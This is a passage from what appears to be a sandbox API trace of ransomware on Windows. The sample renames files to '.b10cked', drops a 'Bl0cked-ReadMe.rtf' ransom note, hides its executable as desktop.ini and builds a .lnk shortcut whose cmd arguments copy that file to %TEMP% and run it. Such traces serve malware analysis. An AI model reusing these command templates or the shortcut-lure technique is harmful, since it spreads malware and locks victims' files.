dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x46f7 [0226.790] ReadFile (in: 
hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x46f4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x46f4, lpOverlapped=0x0) returned 1 [0226.790] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-18164, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x46f7 [0226.790] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x46f4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x46f4, lpOverlapped=0x0) returned 1 [0226.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cii3Zm5ag7.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0226.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cii3Zm5ag7.wav", cchWideChar=14, lpMultiByteStr=0x131324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cii3Zm5ag7.wav", lpUsedDefaultChar=0x0) returned 14 [0226.796] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8deb [0226.796] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0226.796] CloseHandle (hObject=0x1b4) returned 1 [0226.797] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV") returned 0x33 [0226.798] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0226.798] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x210, dwThreadId=0xf00)) returned 1 [0226.803] CloseHandle (hObject=0x120) returned 1 [0226.803] CloseHandle (hObject=0x1b4) returned 1 [0226.803] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0226.803] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\") returned 0x1e [0226.803] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\", cchCount2=30) returned 3 [0226.803] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0226.803] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0226.803] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0226.803] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0226.803] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0226.803] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0226.803] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0226.803] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0226.804] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0226.804] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | 
out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xfb0, dwThreadId=0xdd4)) returned 1 [0226.861] CloseHandle (hObject=0x120) returned 1 [0226.861] CloseHandle (hObject=0x1b4) returned 1 [0226.861] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\bl0cked-readme.rtf")) returned 0xffffffff [0226.861] GetLastError () returned 0x2 [0226.861] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0226.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\bl0cked-readme.rtf")) returned 0x20 [0226.865] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0226.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0226.866] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0226.866] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0226.866] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0226.866] CharUpperBuffW (in: 
lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0226.866] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0226.866] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0226.866] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0226.866] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0226.866] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00") returned 0x26 [0226.867] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x156 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\DESKTOP.INI\" 
& DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x156 [0226.867] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0226.867] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xea8, dwThreadId=0xf3c)) returned 1 
[0226.869] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0228.307] CloseHandle (hObject=0x1b4) returned 1 [0228.307] CloseHandle (hObject=0x120) returned 1 [0228.307] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0228.307] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0228.307] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0228.307] GetTickCount () returned 0x3eef0 [0228.307] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=28509651404) returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x39\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.308] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.308] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.308] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0228.308] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0228.308] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0228.308] CharUpperBuffW (in: lpsz="explorer.exe \"hqVibu00\" & type \"hqVibu00\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"HQVIBU00\" & TYPE \"HQVIBU00\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0228.308] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0228.308] CharUpperBuffW (in: lpsz="explorer.exe \"hqVibu00\" & type \"hqVibu00\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"HQVIBU00\" & TYPE \"HQVIBU00\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0228.308] CharUpperBuffW (in: lpsz="[EXE_NAME]", 
cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0228.308] CoInitialize (pvReserved=0x0) returned 0x0 [0228.308] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0228.309] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0228.309] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0228.309] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0228.312] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"hqVibu00\" & type \"hqVibu00\\desktop.ini\" > \"%TEMP%\\xpv89q8e.exe\" && \"%TEMP%\\xpv89q8e.exe\"") returned 0x0 [0228.312] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0228.312] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0228.312] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0228.312] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00.lnk", fRemember=0) returned 0x0 [0228.322] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0228.322] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0228.322] ShellLink:IUnknown:Release 
(This=0x1d3e18) returned 0x0 [0228.322] CoUninitialize () [0228.323] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.323] ReleaseMutex (hMutex=0xf8) returned 1 [0228.323] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.323] ReleaseMutex (hMutex=0xf8) returned 1 [0228.323] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.323] ReleaseMutex (hMutex=0xf8) returned 1 [0228.323] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.323] ReleaseMutex (hMutex=0xf8) returned 1 [0228.323] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.323] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.323] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28511283034) returned 1 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: 
